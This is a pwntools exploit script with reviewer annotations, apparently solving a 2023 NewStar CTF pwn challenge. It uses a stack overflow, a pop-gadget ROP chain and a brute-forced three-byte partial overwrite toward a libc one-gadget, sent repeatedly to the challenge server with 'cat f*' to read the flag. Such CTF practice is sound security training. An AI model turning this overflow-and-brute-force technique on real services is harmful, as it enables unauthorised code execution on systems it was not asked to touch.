from pwn import *
from LibcSearcher import *
# pwntools session setup: verbose logging, 64-bit target.
context.log_level = "debug"
context.arch = 'amd64'

# Loaded for its side effects only (pwntools prints the binary's properties);
# `elf` is not referenced again in this script.
elf = ELF("./ouput")

# Absolute code address used as a return target. Each use below is followed
# by four zero qwords, which fits a "pop r12; pop r13; pop r14; pop r15; ret"
# sequence -- inferred from the name and the layout, not verified here.
pop_r12_r15 = 0x40124c

# 0x70 filler bytes plus 8 more (presumably the buffer and the saved rbp --
# TODO confirm against the binary), then the overwritten return address.
# NOTE(review): no canary value appears in the payload and every code address
# is absolute, which is consistent with a target built without a stack
# protector and without PIE; confirm with checksec. Either hardening option
# would invalidate the fixed offsets used here.
payload = b'a' * 0x70 + b'b' * 0x8
# Author's note: zero r12 and r15 so the one-gadget constraints are satisfied.
payload += p64(pop_r12_r15) + p64(0) * 4
# Author's note: placeholders -- these only need to keep stepping down the
# stack until the value to be partially overwritten is reached.
payload += (p64(0x40124c) + p64(0) * 4) * 2
payload += p64(0x40124e) + p64(0) * 3
# Three-byte partial overwrite of the next stack value ("one" = one-gadget).
# The low 12 bits (0xafe) equal those of one[0]; the other 12 bits written
# here cannot be derived from anything in this script, which is why the
# attempt is repeated in a loop below.
payload += b'\xfe\x8a\x5e'

# Candidate one-gadget offsets; kept for reference, not read by the code.
one = [0xe3afe, 0xe3b01, 0xe3b04]

# Author's note: start brute-forcing. Every iteration opens a fresh
# connection, so on the service side this shows up as a burst of short-lived
# sessions that each end in a crash.
while True:
    try:
        # io = process("./ouput")   # local run instead of the remote service
        io = remote('node4.buuoj.cn', 25801)
        # gdb.attach(io)
        io.send(payload)
        io.sendline('cat f*')
        # A single byte coming back is treated as success; recv() raising
        # (connection closed) means this attempt failed.
        print(io.recv(1))
        pause()
        # NOTE(review): after pause() returns the loop starts over without
        # closing this connection.
    except Exception:
        # NOTE(review): if remote() itself raised on the first iteration,
        # `io` is unbound here and this line raises NameError.
        io.close()
2023NewStar week5 pwn no_outpue非预期